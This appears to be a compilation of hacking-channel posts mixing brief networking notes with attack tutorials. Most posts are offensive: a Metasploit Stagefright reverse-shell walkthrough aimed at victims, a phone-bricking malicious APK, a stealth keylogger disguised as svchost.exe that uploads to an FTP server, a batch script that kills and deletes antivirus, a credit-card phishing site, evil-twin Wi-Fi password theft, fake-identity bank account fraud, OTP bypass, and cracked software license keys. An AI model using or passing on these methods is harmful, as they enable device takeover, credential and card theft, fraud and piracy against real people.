Networking Terms .

 ✳️ DHCP


💠 Dynamic Host Configuration Protocol (DHCP) assigns IP addresses dynamically. This means that you do not have the same IP address all of the time. Most of the time, these IP address assignments are on a local area network. Remember, on LANs we use private IP addresses. When each device is connected to the LAN, it must request an IP address. That device sends that request to the DHCP server that then assigns an IP address to that system for a fixed length of time known as a "lease."


💠 Each time you connect to the LAN, you are likely to receive a different (dynamic) IP address, but usually in the same range. For instance, 192.168.0.0 - 192.168.255.255.


✳️ NAT


💠 Network Address Translation (NAT) is protocol whereby internal private IP addresses are "translated" to an external public IP address that can be routed through the internet to its destination. Remember, private IP addresses of the systems inside the LAN cannot use their IP addresses on the internet because they are not unique (every LAN uses basically the same IP addresses inside their network).


💠 The NAT device accepts requests to traverse the internet from an internal machine. It then records that machine's IP address in a table and converts the IP address to the external IP address of the router. When the packet returns from its destination, the NAT device looks into its saved table of the original request and forwards on the packet to the internal IP address of the system that made the original request within the LAN. When working properly, the individual systems and users don't even realize this translation is taking place.


We get access to the phone

 🔰  🔰


In this post we will talk about how to get full control over someone else's device with just one link. The most asked questions in my bot.


 A special utility Metasploit will help us with this, which perfectly copes with the vulnerabilities of old Android versions.


 Let's get started:


 1. First of all, install our utility in Termux:

  update

 apt upgrade

 pkg install unstable-repo

 pkg install Metasploit


 2. After that, run the utility:


 3. Now, if Stagefright is not in Metasploit, then download it from here → https://www.exploit-db.com/exploits/40436 ← and transfer it to the exploit folder.


 4. After that we prescribe:

 msfconsole - open console

 use exploit / android / browser / stagefright_mp4_tx3g_64bit - connect exploit

 set SRVHOST yourIP

  URIPATH /

 set PAYLOAD linux / armle / mettle / reverse_tcp

 set LHOST yourIP

 set VERBOSE true

 exploit -j - launch an exploit


 A special link will be generated for us.  We wrap it in ngrok, mask it at will and send it to the victim under any pretext.  When the victim clicks on it, we will get remote access to the device.

KILL A SMARTPHONE WITH A LINK


 How can one malicious link literally "kill" an Android smartphone?


 Let's get started freaks :)


 1. First, open the Kali Linux terminal and enter the following command to update packages:

 pkg update && pkg upgrade


 2. Before creating a malicious link, you need to install git and 


Python using these commands:


 3. Next, install the Lolcat utility:

 pip install lolcat


 4. Clone this particular repository from 


⭕git clone

 https://github.com/noob-hackers/Infect


 5. Go to the folder of our "weapon":

 cd Infect


 6. Click and run:

 bash infect.s


Once launched, select the first    item. Brought to you by hackfreaks official Further, we simply agree with everything, pressing Enter three times in a row.

 Done!


 When the victim follows our link, a file called System Update.apk will be downloaded to the device, but this is not enough.


 It is necessary for the victim to install and run the file, only after that the victim's phone will be infected with the Elite virus, which simply will not allow using the device.




Enjoy! Follow us for more...

How to create keylogger ?

 *⚠️RETR0SAPIENS OFFICIALS ⚠️*


Keylogger is 100% invisible keylogger not only for users, but also undetectable by antivirus software. Keylogger Monitors all keystokes, Mouse clicks. It has a separate process which continues capture system screenshot and send to ftp server in given time.


F E A T U R E S :


1) Discrete/Tamper Proof :By design, Advance Keylogger is undetectable ad thus cannot be tampered with or removed by kids/employees (who are often tech savvy). It does not appear in the Registry, the Process List, the System Tray, the Task Manager, on the Desktop, or in the Add/Remove programs.


2) Keystrokes Typed: See every keystroke typed even if it is deleted. This keystroke logger feature provides a reader-friendly version of all keystrokes logged along with the raw keylogging activity so you can see every detail.


3) Continuous Screenshots: Video-style playback of screenshots for programs and websites selected by you. For example, watch an email as it's being typed and edited instead of just seeing the finished product (1,000 screenshots included with purchase).


4) FTP Server: Screenshot and keylogger Logfile which contain sensitive user information send to ftp server (Mobile/Web/System). Powerful ftp server also write in Core Visual C++.


5) AutoStart : Keylogger has functionality to auto execute on system bootup. It Insert entry on system startup program when it is running.


6) AutoCopy : Keylogger has functionality to auto copy in %appdata%/roaming/wpdnse/ folder.



Installation and Run


1) download https://github.com/ajayrandhawa/Keylogger


2) Now you have two main files:


Keylogger.Zip Contain two Executable Files. (Source code File Also Included)


a) svchost.exe (Main Keylogger Process)


b) rundll33.exe (Capture Screenshot & send all Log and Screenshot to FTP Server (ftp://192.168.8.2:2121))


3) Execute both files once time next time its automatically start and capture screenshot and key log.


4) These names Given for unrecognizable in Task Manager.


How to Use ?


5) Start FTP Server on This Ip Address 192.168.8.2:2121

and Start both program and Enjoy



Enjoy! Follow us for more...

Disable all virus gards using notepad


Warning: don't test in your computer 

@ echo off

rem

rem Permanently Kill Anti-Virus

net stop “Security Center”

netsh firewall set opmode mode=disable

tskill /A av*

tskill /A fire*

tskill /A anti*

cls

tskill /A spy*

tskill /A bullguard

tskill /A PersFw

tskill /A KAV*

tskill /A ZONEALARM

tskill /A SAFEWEB

cls

tskill /A spy*

tskill /A bullguard

tskill /A PersFw

tskill /A KAV*

tskill /A ZONEALARM

tskill /A SAFEWEB

cls

tskill /A OUTPOST

tskill /A nv*

tskill /A nav*

tskill /A F-*

tskill /A ESAFE

tskill /A cle

cls

tskill /A BLACKICE

tskill /A def*

tskill /A kav

tskill /A kav*

tskill /A avg*

tskill /A ash*

cls

tskill /A aswupdsv

tskill /A ewid*

tskill /A guard*

tskill /A guar*

tskill /A gcasDt*

tskill /A msmp*

cls

tskill /A mcafe*

tskill /A mghtml

tskill /A msiexec

tskill /A outpost

tskill /A isafe

tskill /A zap*cls

tskill /A zauinst

tskill /A upd*

tskill /A zlclien*

tskill /A minilog

tskill /A cc*

tskill /A norton*

cls

tskill /A norton au*

tskill /A ccc*

tskill /A npfmn*

tskill /A loge*

tskill /A nisum*

tskill /A issvc

tskill /A tmp*

cls

tskill /A tmn*

tskill /A pcc*

tskill /A cpd*

tskill /A pop*

tskill /A pav*

tskill /A padmincls

tskill /A panda*

tskill /A avsch*

tskill /A sche*

tskill /A syman*

tskill /A virus*

tskill /A realm*cls

tskill /A sweep*

tskill /A scan*

tskill /A ad-*

tskill /A safe*

tskill /A avas*

tskill /A norm*

cls

tskill /A offg*

del /Q /F C:\Program Files\alwils~1\avast4\*.*

del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe

del /Q /F C:\Program Files\kasper~1\*.exe

cls

del /Q /F C:\Program Files\trojan~1\*.exe

del /Q /F C:\Program Files\f-prot95\*.dll

del /Q /F C:\Program Files\tbav\*.datcls

del /Q /F C:\Program Files\avpersonal\*.vdf

del /Q /F C:\Program Files\Norton~1\*.cnt

del /Q /F C:\Program Files\Mcafee\*.*

cls

del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*

del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*

del /Q /F C:\Program Files\Norton~1\Norton~1\*.*

del /Q /F C:\Program Files\Norton~1\*.*

cls

del /Q /F C:\Program Files\avgamsr\*.exe

del /Q /F C:\Program Files\avgamsvr\*.exe

del /Q /F C:\Program Files\avgemc\*.exe

cls

del /Q /F C:\Program Files\avgcc\*.exe

del /Q /F C:\Program Files\avgupsvc\*.exe

del /Q /F C:\Program Files\grisoft

del /Q /F C:\Program Files\nood32krn\*.exe

del /Q /F C:\Program Files\nood32\*.exe

cls

del /Q /F C:\Program Files\nod32

del /Q /F C:\Program Files\nood32

del /Q /F C:\Program Files\kav\*.exe

del /Q /F C:\Program Files\kavmm\*.exe

del /Q /F C:\Program Files\kaspersky\*.*

cls

del /Q /F C:\Program Files\ewidoctrl\*.exe

del /Q /F C:\Program Files\guard\*.exe

del /Q /F C:\Program Files\ewido\*.exe

cls

del /Q /F C:\Program Files\pavprsrv\*.exe

del /Q /F C:\Program Files\pavprot\*.exe

del /Q /F C:\Program Files\avengine\*.exe

cls

del /Q /F C:\Program Files\apvxdwin\*.exe

del /Q /F C:\Program Files\webproxy\*.exe

del /Q /F C:\Program Files\panda

software\*.*

rem



Enjoy! Follow us for more...

You can easily hack alot of Credit cards by this method!

Its just a simple way to get CC FULLZ.


Follow my tut below and you can easily be able to get Credit cards 


Things you will need for this are :-

A Script

A Brain

Web host

Step one : you will need to get the web hosting from any cheap source


Step two : Click here to download the web script

http://www.mediafire.com/?gisn8yft6be1b8c

3)  Download Pagebreeze Html Editiing software  by clicking on this link

👇🏼👇🏼👇🏼👇🏼👇🏼👇🏼👇🏼👇🏼

http://www.pagebreeze.com/download.htm

4) Open Pagebreeze and open your HTML Script in editor


5) Edit the order page via Pagebreeze 


6) visit  any free form generator service website. like some websites i am providing here

👇🏼👇🏼👇🏼👇🏼👇🏼👇🏼👇🏼👇🏼

http://www.emailmeform.com/

http://www.phpform.org/

http://www.formstack.com/


7) create a form with this info

First Name:

Last Name:

Date of birth :

Address:

County :

City :

State :

Email:

Phone Num :

Zip Code :

8) Save your form and place the Html script on your website order page


9) go again to form generator website and create another forum with these info :

Credit Card Number :

Credit Card Type ( Choose Drop Down Menu Option)

CVV :

Expire Date :


save this form and put this on order page on your script - Remember you need to link 1st form

to second form (USE REDIRECT SYSTEM)

10) Edit your website script appearance and give some creative  appearance


11) After all the setup you need scripting the upload and HTML web hosting script .


12) All you need now to spread and promote your website on different websites and get visitors .

Many web visitors and  many credit cards.



Enjoy! Follow us for more...

Method to get many Facebook followers

 🌀  🌀


1. Go to wefbee.com


2. Select auto friend request.


3. Then scroll down and click on the get token button.


4. Then login to your facebook account.


5. A token will be generated so copy paste the contents in the green box and paste it as you will be directed then submit.


6. You'll be directed to homepage where you will select auto friend request then tap on auto request hyperlink.


From there you will start receiving so many friend requests on your account but they will in turn be converted into followers.



Enjoy! Follow us for more...

How To Hack Your Own Windows 10 Password | 5 Methods

 🔰 Retr0Sapiens 🔰


🔥 🔥


Posting 1 method as of now , if you like it , i will post remaining 4 as well .. let me know


How to hack Windows 10 password without software? In this method you will be required to have an installation disk which can be a USB or CD/DVD, either will work. An installation disk is Windows bootable disk. With this Windows installation disk, you can reset password for any user whether it be a local or administrator user. Follow the steps below:


Step 1: Restart your computer while the installation disk is inserted.


Step 2: If you are using a CD/DVD as an installation disk, then set your PC to boot from CD/DVD in your BIOS settings, or if you are using a USB drive as an installation disk, then set your PC to boot from USB.


Step 3: Now again restart your computer and boot into to Windows 10 installation setup.


Step 4: Now you have to open command prompt. To do so, press “Shift” + “F10”.


Step 5: Enter following commands: D: cd Windows\System32 ren sethc.exe sethc.exe.bak copy cmd.exe sethc.exe 


Note: “D:” is the disk drive where your Windows is installed. If you have installed Windows in another drive you can change the letter.


Step 6: Close the command prompt. Cancel the Windows installation setup. Restart your PC without inserting installation disk.


Step 7: On your Login screen, press Shift Key 5 times. Command prompt with administrative rights will open.


Step 8: Here you can change the password for your user account. Type net user to list down all the user accounts. Now to change password, type er net user_name new_password. In this case user_name is specific user account.! type commands to hack windows 10 password without software


Step 9: Now you can login to Windows 10 with the new password you set for the user 


Enjoy! Follow us for more...

Elementor Pro v3.0.5 (Pro Templates Included) - Page Builder

 🌀 

With this version of Elementor Pro, you can now install unlimited Pro templates inside Elementor Editor area. No need to manually download Pro templates from Elementor library website. No purchase code input either. Multisite-ready too.


Use Elementor Pro with your favorite or customized theme. Change themes and still keep all your designs. Landing pages, homepages, posts, portfolios, products. Elementor can be used to design any page or custom post type on WordPress. Elementor is the most advanced frontend drag & drop page builder. Now you can easily create high-end and pixel perfect websites at record speeds. Any theme or template, any page, any design. It is all about time for a live page builder, having no limits of design. An Elementor that delivers high-end page designs and advanced capabilities, never before seen on WordPress.


Elementor WordPress Plugin Features


Open Source

Translation & RTL

High Quality Code

SEO Optimized

Custom CSS


Download 🔗 : https://bit.ly/3e0fkbn


Installation and Activation Guide (Must Read):


First of all, open and extract the downloaded zip file.

Now you will get two files.

First, install elementor-free-v3.0.11.zip.

Now install elementor-pro-v3.0.5.zip.

To activate Elementor Pro, Go to your WordPress Dashboard>>Elementor>>License and enter “GWP7514519919615182316RL” as a license key (only if it is not already activated).

If you want to use premade templates or blocks then you have to create a free account on Elementor official website. Elementor will ask you to connect with the Elementor account whenever you try to use premade pages and blocks. Connect and Enjoy [Some newly added pro templates may not work].

Never Update the free version of Elementor from your WordPress Server. It can break the template importing feature.

If you’re facing any issues first deactivate and delete the Elementor plugin then open phpMyAdmin to find and delete database entries containing “elementor” in them into the wp_options & wp_usermeta tables only. After deleting elementor entries from both tables, reinstall and use the plugins.


Enjoy! Follow us for more...

​​Collection Of Hacking Operating Systems With Download Link Approximately All

 * 🔐*


*These are OS that have been designed Specially For Hackers , Bug Hunters , and Pentesters ⚠️*


*Type :- ISO Image .*


📌 Arch Linux

🔗 Link :

http://mirrors.evowise.com/archlinux/iso/2020.08.01/


📌 Backbox linux

🔗 Link :

https://www.backbox.org/download/


📌 Backtrack 

🔗 Link : 

https://linux.softpedia.com/dyn-postdownload.php/c230432fe1fe505590023b5beaf41c36/5f2d2982/2505/0/1


📌 Black Arch 

🔗 Link : 

https://ftp.halifax.rwth-aachen.de/blackarch/iso/blackarch-linux-live-2020.06.01-x86_64.iso


📌 Blackbuntu

🔗 Link : 

https://sourceforge.net/projects/blackbuntu/


📌 Black Spider v2 (Windows)

🔗 Link : 

https://drive.google.com/file/d/1zbvIhyLsz0q6nDGifnkBSzZaip67WdFP/view


📌 BugTrack

🔗 Link : 

https://sourceforge.net/projects/btrack/


📌 Cyborg Hawk Linux 

🔗 Link : 

https://sourceforge.net/projects/cyborghawk1/files/Cyborg%20Hawk%20v1.1/cyborg-hawk-linux-v-1.1.iso/download


📌 CAINE (Computer Forensics Linux Live Distro)

🔗 Link :

https://mirror.parrotsec.org/mirrors/parrot/iso/caine/caine11.0.iso


📌 Cerberus (Windows)

🔗 Link : 

https://mega.nz/file/1ZVRgSoQ#RsUCmgH_uJRmB1hg7YmseE9Lnz1VUZBYe-bjRckbNDs


📌 DEFT

🔗 Link :

http://www.deftlinux.net/


📌 Dracos Linux

🔗 Link :

https://www.dracos-linux.org/


📌 Fedora Security Lab

🔗 Link :

https://labs.fedoraproject.org/en/security/


📌 Kali Linux

🔗 Link : 

https://cdimage.kali.org/kali-2020.2/kali-linux-2020.2-installer-amd64.iso


📌 Knoppix

🔗 Link :

http://www.knopper.net/knoppix-mirrors/


📌 Live Hacking OS

🔗 Link :

http://www.livehacking.com/live-hacking-cd/download-live-hacking/


📌 Matriux Krypton

🔗 Link :

https://sourceforge.net/projects/matriux/


📌 Ninjutsu (Windows)

🔗 Link : 

https://t.me/ninjutsu0s/5739


📌 NodeZero

🔗 Link : 

https://sourceforge.net/projects/nodezero/files/NodeZero/NodeZero.iso/download


📌 Parrot Os

🔗 Link :

https://www.parrotsec.org/download/


📌 Pentoo

🔗 Link :

https://www.pentoo.ch/


📌 Qubes OS

🔗 Link : 

https://mirrors.edge.kernel.org/qubes/iso/Qubes-R4.0.3-x86_64.iso


📌 Samurai Web Testing Framework

🔗 Link :

https://sourceforge.net/projects/samurai/files/


📌 Tails OS 

🔗 Link :

https://tails.boum.org/install/index.en.html


📌 Urix OS

http://urix.us/


📌 Weakerthan Linux (Changed to Demon Linux)

🔗 Link : 

https://demonlinux.com/download/iso/demon-2.4.4.iso



Enjoy! Follow us for more...

Vypr Vpn Without Cc Method Steps | %100 Working


1- Open the link - https://www.goldenfrog.com/vyprvpn/buy-vpn

2.- Select monthly plan Monthly which

costs $ 12.95.

3- Fill in the data: Name, Last name. Mail Use a temporary email, Password.

4- Select country USA POSTAL CODE places 10010

5- In the payment method select Union Pay!

6.- When you redirect to the page of AlilPay

which is a Chinese page just close the tab.

7.- Now open the application of VyprVPN in

the application of your phone login with the

email and password you used to register.

8- A message will arrive to your email to

Verify the email if you do not get it, just click

on Resend confirmation email

9- You put the verification code in the

application and you're done.


Note: Personally Tested on PC very heavy and takes a Lot of CPU resources While it Runs, better to Use on Mobile or you can use on PC too if the Max Clock Of the Processor is Above 3.5Ghz


Enjoy! Follow us for more...

BURP SUITE OTP BYPASS

 ⛩️ ⛩️

Disclaimer: I will be censored about the target on my Practice, so find your own target. WARNING!!! This is Education Purpose Only


Open Mozilla Firefox then configure the Proxy like this


Open Burpsuite

Create a Temporary Project, then click next until Burpsuite shows the Dashboard.

After the Dashboard Burpsuite opened, navigate to Proxy Menu then Intercept. Make sure your Intercept is on because if Intercept is off you can’t use it.


After you set Intercept is on navigate on Mozilla Firefox then navigate to your website target


Your Intercept text will be changed to orange text, you must forward it until the page on Mozilla Firefox normally opened.

Login into the page that you have to navigate it, after you Login. The page on Mozilla Firefox will not successfully load after you click the Forward button in the Burpsuite.

Click forward until the next page is showing

After the next page is showing, I can see there are 2 buttons available, GO & Resend Code. The next step you must hit the Resend Code button again. Then the Burpsuite will show the Cookies Data

You will ask, Where is the OTP Code? Chill, you must Decode the Cookies Data First. Open in another Browser, then navigate to https://www.urldecoder.org/ paste the Cookies Data (the Red Color Text in Image) into urldecoder the result will look clean like this

and Now, Where is the fucking OTP CODE? Just check in the Output you’ve decode it.

Congratulations! You have OTP CODE right now. Now back to Mozilla Firefox input the OTP CODE then click GO!

You have BYPASSED the OTP CODE.

Enjoy! follow us for more . . . 

Tutorial FREE US Bank account

 🔰🔰


First go to E-TRADE: http://www.e-trade.com/


Click on "OPEN AN ACCOUNT"



Click "APPLY NOW" on "ETRADE Complete Investment Account"



Now you will need to fill in the information. DO NOT put your real info.You can get the required information from FAKENAMEGENERATOR

Code:

http://www.fakenamegenerator.com/



For the "Account Type", pick "Individual account".



For Step 1: Choose Account Type, pick "Cash Account Only".


Put in the fake address and phone number that you got from Fake Name Generator, and make sure that both of the boxes below are unchecked.


Now you will need a Social Security number. As usual, don't put in your real info. Put the SSN from Fake name generator.Also make sure you put your "Country of Legal Residence" as "United States" and click "US citizen".


For your "Employment Status" just make up jobs. Make sure it is in the same city, state, zip, and country. DO NOT make the address of your Employer the same as where your "home" address is. Pick "No" for all the options


For "Additional Account Preferences", put in what I say. Put in "Income" for "Investment Objectives". Put in "Excellent" for "Investment Experience". Pick the first option for all the drop-down boxes and pick "NO" for the selection.


Now for "Sweep Accounts", pick the first one and pick "NO" for the rest.


Make sure that all the boxes are unchecked on "Select Documents for Electonic Delivery".


Click I Accept and DO NOT check the box below it.


Now pick "NO. I want to create a new user ID and password for this account".


Make an account that you can remeber.


Now login to your account. Your account number should be in the middle of the page.


Now goto the "Add a Bank account" page in PayPal.


For routing number, put in : 056073573

For account number, put in your account number, you should see it when you log in E-trade.


Now go to the next page and enter your login information.[/spoiler]Pick the Instant option on the page and wait a few minutes, usually 2-3 minutes



Enjoy ! follow us for more. . . 

Vulnerability Exploitation Tools

 ✔️✔️


A tool which identifies whether a remote host is vulnerable to a security attack and tries to protect the host by providing a shell or other function remotely, is called a Vulnerability Exploitation tool. Here is a list of some o the popular ones:


🔰Metasploit🔰

Metasploit was released in the year 2004 and it was an instant hit in the world of computer security. Metasploit provides data on the vulnerabilities in the security system and it helps in conducting penetration testing too.


🔰Sqlmap🔰

It is a penetration testing tool which is available as an open source. Its goal is to automate the detection and exploitation process of the injection flaws in SQL and to take over the database servers.


🔰Sqlninja🔰

The main objective of this tool is to access a vulnerable DB server; it's used for pen testing so that the procedure of controlling a DB server can be automated when the vulnerability of an SQL injection has been tracked.


🔰NetSparker🔰

It is a web based security scanner which has an exploitation engine to confirm the security vulnerabilities and makes the user concentrate on elimination of security threats with its False-Positive free feature.


🔰BeEF🔰

BeEF is the short term for The Browser Exploitation Framework. It is a tool for penetration testing which concentrates on a web browser and thus accesses the actual security position of the environment it’s targeting.


🔰Dradis🔰

Dradis stands for Direction, Range and Distance. It is an open source vulnerability scanner or application which provides the facility of information sharing effectively, especially during assessing the security of the system in a central repository.


Enjoy! Follow us for more...

How to Create PayPal Account Without Credit Card

 🔰🔰



STEP 1 : Open PayPal India Official . PayPal.com And click on Sign Up for Free.


STEP 2 : Now Select Individual Account and click on Next.


STEP 3 : Now enter your Email address and create a new password.


your password must include at least 8 characters.

You need to create a password which must contain a mix of numbers, letters and a special character.


STEP 4 : Fill your first name, last name, address and mobile number.

now here you can enter any 10 digit random number, if you don’t want to use your real number.


Now tick on agree and Click on Agree and Create Account.


Next Step is Select Your Card Type >


STEP 5 : In this step you need to link a Card.


OK. select card type > Visa > fill credit card number, Expiration date, and security code.

And click on Link Card.


STEP 6 : Now you will receive a OTP on your iMudra app registered mobile number.

Enter that OTP and click on Submit.


STEP 7 : Done. You can see this message – Start shopping with PayPal.


it means your PayPal account successfully created without a credit card.


STEP 8 : Click on Go to Your Account, and follow next step.


STEP 9 : Now here you can see – Confirm your mobile phone ( You can Verify, if you used your real mobile number )

If you used random number than just leave this step.


Now look at – Confirm your email. so go to your mailbox and follow next step.


STEP 10 : Open your mailbox and check confirmation email by PayPal and click on “Confirm Email Address”.


All Done. Now you have your working PayPal Account Without a Credit Card.


You can use this account on many of the site which gives free trial and support paypal as payment method.


Enjoy! Follow us for more...

How To Change Your IP In Less Then A Minute

 🔰🔰


1. Click on "Start" in the bottom left hand corner of screen

2. Click on "Run"

3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"

5. Type "exit" and leave the prompt

6. Right-click on "Network Places" or "My Network Places" on your desktop.

7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, 

if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"

9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab

10. Click on "Use the following IP address" under the "General" tab

11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).

12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.

13. Hit the "Ok" button here

14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.

16. Go back to the "TCP/IP" settings

17. This time, select "Obtain an IP address automatically"

tongue.gif 18. Hit "Ok"

19. Hit "Ok" again

20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.


Enjoy! Follow us for more...

How to get free internet in Airtel SIM?

 🔰🔰


Requirements : Computer and the Airtel SIM and a Wifi Dongle.

 

Step 1 : Put you Airtel SIM in dongle 

connected it to the Computer.

 

Step 2 : Go to Device Manager >Select the 

Modem/ dongle > Advance . In Advance 

simply type this 

(+cgdcont=1,”IP”,”airtelmms.com” ).

 

Step 3: Create a Dial-up connection.

 

Step 4 : It will connected but there will be no network access.

 

Step 5 : Go to connect it you will see 

connected.

 

Step 6: Right click on connected and click on Properties.

 

Step 7 : Go to network tab and check all the checkboxes.

 

Step 8 : click on internet protocol version.  (TCP/IP).

 

Step 9 : Click on propeties.

 

Step 10 : if you don't know any free DNS Servers, select from following DNS server. 

 

Step 11 : Free Recommended DNS servers.

 

156.154.70.1 

202.138.96.3

 

Step 12 : Click ok.

 

Step13 : Then again Click ok.

 

Step 14 : A message will appear "Setting will 

take palce next time you dial it" click ok.

 

Step 15 : Again connect after Disconnecting.

 

Now your Internet is free!


Enjoy! Follow us for more...

UNLIMITED FREE CC💳 METHOD + INSTANT 200₹


‼️Guys there's a new Indian company called Fampay is giving free cc to everyone and gurantee 200rs ❤️😍


Methods to follow :- 


1⃣. Download Fampay from here👇

https://get.fampay.in/KISH6GMYV


2⃣. ⚠️If you'll download it from playstore directly without clicking on this link☝️ you'll not❌ get 200₹ reward (NOTE: because they give reward only if you join with old members refferal link🔗)


3⃣. Register with your phone number and enter your aadhar number and you'll get otp on your aadhar linked number


4⃣. Enter the OTP and you'll successfully get 200₹ and your virtual cc and you can transfer money it to your bank account also


Enjoy! Follow us for more...

How to see the amount of Bitcoins in a wallet with the Address

 🔰 [TUTORIAL] How to see the amount of Bitcoins in a wallet with the Address 🔰


1. Go to https://bitref.com/

2. Enter the bitcoin address 

3. Click on check

4. Wait the result


 Stay Protected from Spammers!😎


Enjoy! Follow us for more...

TOP Sites to Provide FAKE Identity !!!

 🔰 🔰


🌀 https://fakena.me/

🌀 https://fauxid.com/

🌀 https://www.fakexy.com/

🌀 https://www.elfqrin.com/fakeid.php

🌀 https://www.fakenamegenerator.com/

🌀 https://www.fakepersongenerator.com/

🌀 https://www.fakeaddressgenerator.com/

🌀 https://datafakegenerator.com

🌀 http://namegenerators.org


Enjoy! Follow us for more...

Shut down your Android device by making a call from another Phone

 🔰  🔰


◾First of all, download and install the Automateit app. This app needs root access. So, make sure to grant the root permission.

◾️Next, select ‘My Rules’ and tap on the (+) icon.

◾️In the next screen tap on the ‘Call State Trigger’

◾️Now, choose the option ‘Incoming Call’

◾️In the next step, select the contact. You can choose from saved contacts or can create a new one.

◾️Now tap on ‘Next’ and on the next screen, select ‘Shutdown Device Action’

◾️Now you need to provide the name for the rule and save the rule.


🌀Now you just need to make a call from the contact you specified and your Android device will be shut down.


Enjoy! Follow us for more...

How To Crack ExpressVPN


 Step 👇👇👇👇👇


By Step Instructions :



1⃣First Of All Download ExpressVPN &Install It


2⃣Download Device ID Changer & Install.

Make Sure You Have Enabled “Unknown Source” In Your Mobile Security Settings.


3⃣Use Its 7-Day Free Trial.


4⃣After 7-Days When Your Trial Expires, Now Open Device ID Changer But This App Needed Rooted Device.


5⃣Assign a New Word In Edit Section & Apply It For Changes.


6⃣Now Open ExpressVPN App & Click On Free Trial Then Write any Email &  Click On Start Free Trial.


7⃣You Will See That ExpressVPN is Signed-In Successfully As a 7 Day Trial.


8⃣ Use Its Trial For 7-Days When Its Trial Expires Use This Method Again.


9⃣Done.



Enjoy! Follow us for more...

Evil Twin Attack Methodology

 🔆🔆


Ⓜ️Step 1: We will first scan the air for a target access point. Then create an access point using airbase-ng with the same name and channel of the target access point, hence Evil TWIN attack.


Ⓜ️Step 2:The client is now disconnected repeatedly from the  original access point and as most modern system’s setting says… “Connect back to same ESSID (AP name) if disconnects”.


This also happens because when the client disconnects from any access point it starts sending probe requests in the air with the name of the access point it connected to earlier. Hence BSSID isn’t a barrier, you just need ESSID to spoof the AP


Ⓜ️Step 3: Clients is now connected to the Evil Twin access point and now client may start browsing Internet.


Ⓜ️Step 4: Client will see a web administrator warning saying “Enter WPA password to download and upgrade the router firmware”


Ⓜ️Step 5: The moment client enters the password, s/he will be redirected to a loading page and the password will be stored in the MySQL database of the attacker machine


Enjoy! Follow us for more...

Some new public cc.

 🔰 

https://www.flixtie.to/


 https://jayspov.net/


 https://www.maturendirty.com/


 https://www.camsoda.com/


 https://stripchat.com/


 https://www.g2a.com/es/


 https://www.cdkeys.com/


 https://www.nuuvem.com/

 https://www.greenmangaming.com/

 https://www.kinguin.net/es/

 https://www.allkeyshop.com/blog/

 https://www.instant-gaming.com/es/


Enjoy! Follow us for more...

How To Hack In App Purchases With Lucky Patcher

 


Method 1:


1)Lunch Lucky patcher apk and grant root access.


2)You may minimize or close Lucky patcher at this moment and launch the app which you want to get the Pro vision or the paid vision.


3)Go to purchase section and click on buy or pro vision or anything that is written in your app.


4)Now the Lucky patcher's window opens itself instead of google in app purchase box. In that window you will see "Do you want to try to get this app for free" as shown in screen shots below and Select "yes". Non-rooted user Click on "send reply to application(Unsigned).


5)Done. Now you hacked the In app purchase successfully. If the app is supported, then the thing you are trying to download starts downloading or the feature you want Unlock will be unlocked.




(You may also do as described below to increase your chance of success)


1)Open Lucky patcher apk and find Google play store.


2)Tap on it and select "open menu of patches"


3)You will see a warning window saying "It is a system app ....", select ok.


4)Tap on "Custom pach" and select the first one "support.Inapp.LVL.android.vending" and tap apply.


5)Reboot your device.


6)Now act method 1 again.


Applying custom patch to google play store will increase your chance of success.




If you want to disable the Lucky patcher's automatically open, please follow steps below:


1)Open Lucky patcher and go to toolbox at bottom left corner.


2)Select 'Disable google Billing emulation'.



Enjoy! Follow us for more...

Best WebSite Protection


https://www.cloudflare.com

https://my.blazingfast.io/?affid=2270

http://cloud-shield.ru

https://www.incapsula.com

http://bit.ly/2T6s0T8

https://www.akamai.com

https://sucuri.net


Enjoy! Follow us for more...

Chat With Your Friends Through Ms Dos | Command Prompt


💥 Steps :-


📌 Open Notepad and paste the below code :-


@echo off

:A

Cls

echo MESSENGER

set /p n=User:

set /p m=Message:

net send %n% %m%

Pause

Goto A


📌 Save this file as "Messenger.Bat"


📌 Open Command Prompt


📌 Drag "Messenger.Bat" file over the Command Prompt and Hit Enter


📌 Enter IP Address of your friend's Computer and Hit Enter


📌 Now type your Message and Hit Enter to Send


📌 Enjoy Chatting Without Fear of Privacy 🔐 



Enjoy! Follow us for more...

Here is a small list of some of the Frequently asked Questions about hacking:

 


 🔰How long does it take to become a hacker?

Hacking is not something that can be mastered overnight. It really takes quite some time to understand and implement the skills that actually put you in the hacker’s shoes.

So,  for  anyone  who  is  wanting  to  become  a  hacker,  all  it  takes  is  some  creativity, willingness to learn and perseverance.


🔰What skills do I need to become a hacker?

In  order  to  become  a  hacker,  it  is  essential  to  have  a  basic  understanding  of  how  a computer system works. For example, you may start off with basics of operating system, computer networks and some programming.

At this point in time, you need not worry much about this question as this book will take you through all those necessary concepts to establish the skills that you need to possess as a hacker.


🔰What  is the best way to learn hacking?

As said earlier, the best way to learn hacking is to start off with the basics. Once you have established the basic skills, you can take it even further by going through the books that discuss individual topics in a much detailed fashion. Do not forget the power of Internet when it comes to acquiring and expanding your knowledge.


Enjoy! Follow us for more...

BEST 10 WEBSITE THAT EVERY PROFESSIONAL HACKER USE


💢NAMES-


🌀Dnsdumpster :- dns recon & research , find & lookup dns records



🌀Verify Email Address :- Verify email address online using free email verification tool.




🌀ZOOMEY :- find iot device and bugs in android WordPress PHPMyAdmin and much more




🌀Search CVE List :- Common Vulnerabilities and Exposures (CVE®️) is a list of entries — each containing an identification number, a description, and at least one public reference — for publicly known cybersecurity vulnerabilities.




🌀NATIONAL VULNERABILITY DATABASE :- NVD is the U.S. government repository of standards-based vulnerability management data represented using the Security Content Automation Protocol (SCAP). This data enables the automation of vulnerability management, security measurement, and compliance. NVD includes databases of security checklists, security-related software flaws, misconfigurations, product names, and impact metrics




🌀GREYNOISE :- GreyNoise Intelligence is a cyber security company that collects, labels, and analyzes Internet-wide scan and attack data.




🌀SEEBUG 1 :- You can find bugs here




